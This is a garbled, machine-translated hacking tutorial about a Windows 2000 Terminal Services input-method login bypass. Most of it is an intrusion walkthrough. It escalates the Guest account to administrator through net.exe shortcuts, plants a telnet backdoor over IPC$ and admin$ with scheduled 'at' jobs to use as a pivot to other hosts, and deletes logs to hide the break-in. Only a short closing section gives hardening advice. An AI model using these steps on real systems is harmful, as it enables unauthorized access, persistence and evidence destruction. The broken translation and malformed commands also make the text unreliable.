Win2000
The Chinese Simplified Edition is in the input method, which allows the local user to bypass the identity verification mechanism into the system inside. Experiment,
Win2000
The Chinese Simplified Edition end service still exists in this vulnerability during remote operation, and it is harmful.
Win2000
Terminal service function, enable system administrator
Win2000
Performing a remote operation, using a graphical interface, which enables users to function when remotely control your computer, the default port is
3389
User as long as it is installed
Win2000
The client connection manager can be associated with a computer that opens the service. So this vulnerability makes terminal services become
Win2000
Legal Trojan.
Tool: Client Connection Manager, download address: I am looking for it yourself, there are several kinds every day.
Intrusion step:
First, get an administrator account.
Let's scan a network segment and the scanner is set.
3389
, Run the client connection manager, add any address scanned to, set the client connection manager, and then connect with the server. After a few seconds, the screen is displayed on the screen.
Win2000
Login interface (if you find English or traditional Chinese version, give up, change another address), use
Ctrl Shift
Fast switching input method, switch to full fight, at this time, the input method status will appear in the lower left corner of the login interface (if not, please be patient, because the other party's data stream transmission has a process). Use the right click on the Microsoft logo on the status bar, pop up
"
help
"
If you find
"
help
"
Gray, give up, because the other person is likely to find and have added this vulnerability), open
"
help
"
In the column
"
Operation guide
"
, Right click on the top taskbar, pop up a menu, open
"
Jump
URL "
. It will appear at this time
Win2000
The system installation path and the blank bar for the path we filled in. For example, the system is installed on the C drive, which is filled in the blank bar.
"C: / WinNT / System32"
. then press
"
determine
"
So we successfully bypass authentication and entered the system.
System32
table of Contents.
Now we have to get an account and become a legitimate user of the system. Find in this directory
"net.exe"
,for
"net.exe"
Create a shortcut, right-click this shortcut,
"
Attributes
"
-
>
"aims"-
> c: /winnt/system32/net.exe
The back is empty, fill in
"User Guest / Active: YES"
point
"
determine
"
. This step is
Net.exe
Activation is forbidden to use
guest
Of course, you can also use
"User
Username Password/
Add "Add"
Create a new account, but it is easy to doubt. Run this shortcut, you won't see the running status, but
guest
The user has been activated. Then modify this shortcut, fill in
User Guest
password
"
, Run, so
guest
There is a password. Finally, modify it again, fill in
LocalGroup Administrators Guest / Add
,will
guest
Get a system administrator.
Note: 1. In this process, if the other party is using the Terminal Services Manager, he will see the process ID you open.
,your
IP
And machine names, and even send you a message.
2, the terminal server only leaves you a minute when verifying your identity, in which you can't finish the above operations, you can only connect.
3. The image and operation you have seen will be delayed, which is affected by the speed.
Second, create a springboard.
Log in again to the terminal server,
"guest"
Into, at this time
guest
It is already a system administrator, which has everything executable. turn on
"
control panel
"
,enter
"
Network and Coaching
"
,in
"
local connection
"
or
"
Coach connection
"
View attributes in, see if the other party choose
Microsoft
Network file and printer sharing
"
If not, you will hook. If the other party is used, the next-time network share will open.
Exit the other party system, in the local command prompt, type
NET USE // IP Address / IPC $ ["Password"] / user: "guse"
,by
IPC
The remote login is successful.
Copy one after the success
Telnet
Procedure to go (Small Shura Express)
Tools
Directory
Srv.exe,
and also
NTML.XEX
For a while, this program is open on the other side.
Telnet
Service, the port is
99
.
Copy c: / whack/srv.exe //***.***.***.***/admin $
Then use the timeline service to start it, first understand the other party:
Net time //***.***.***.***
display:
//***.***.***.***
The current time is
2001/1/8
in the afternoon
08:55
The command successfully completed.
Then start
SRV.EXE: AT //***.***.***.*** 09:00 Srv.exe
display:
Added a job, its homework
ID = 0
After a few minutes,
Telnet ***. ***. ***. *** 99
You don't need to verify your identity, log in directly, show:
C: / Winnt: / System32>
We have successfully landed. Then open the command prompt locally, open another window, type:
Copy C: /Hack/NTLM.EXE //211.21.193.202/admin
Store prior
Hack
Directory
Ntlm.exe
Turn over. Then return to the just now
Telnet
Window, run
Ntlm.exe C: / Winnt / System32> NTLM
display:
Windows 2000 Telnet Dump, By Assassin, All Rights Reserved. Done! C: / Winnt / System32> C: / Winnt / System32>
Ok, now I
Win2000
self
Telnet
First end
Srv.e
They start
XE
of
Telnet
service:
NET STOP TELNET
The system tells you that there is no startup
Telnet
Ignore it, continue:
Net Start Telnet
This time I really started.
Telnet
, We can call Telnet in another command prompt window
To each other
twenty three
Port, verify identity, enter our
guest
Accounts and passwords, it really becomes our springboard. We can use it to other hosts.
Third, sweep the footprint:
Delete
Net.exe
Created shortcut, delete
Winnt / System32 / Logfiles
Looked log file
Traperate method:
1
,Patch
2
, Delete input method help files
3
Stop the terminal service.
Win 2000 Sever 3389
Safety problem solving
Correct approach:
in
Windowsupdate.microsoft.com
Update all key updates, then pay attention to the administrator password to
8
The above digital alphabet is mixed, it is best to have a symbol! (This is very important, the symbol is
!% # $ &
These. ), Then do it is (Prerequisite, this machine does not need to create a machine access in the local area)
Run.bat
File, put the following:
Net Share IPC $ / DEL NET Share Admin $ / DEL NET Share C $ / DEL NET Share D $ / DEL
. . . . . There are several partitions to write a few, saved to the startup menu.
Then disabled
RunaS Service, Remote Registry Service, Task Sheduler
,
DNS, DHCP
Waiting for services, it is also set to manually.
QOUTA
,
Daytime
Waiting for services to be turned off
DOS
,in
IIS
Insert
.ida, .idq, .printer
Map, use
IPsec
Filter off the external network access
135
,
139
,
445
,
3389
port
Also pay attention to if it is installed
MSSQL
Put
SA
The default empty password is changed,
mysql
of
root
Password is changed
Also if your website has the function of uploading an attachment, please pay attention to the filter extension! It is best not to use
PHPBB
The forum has recently found a vulnerability.
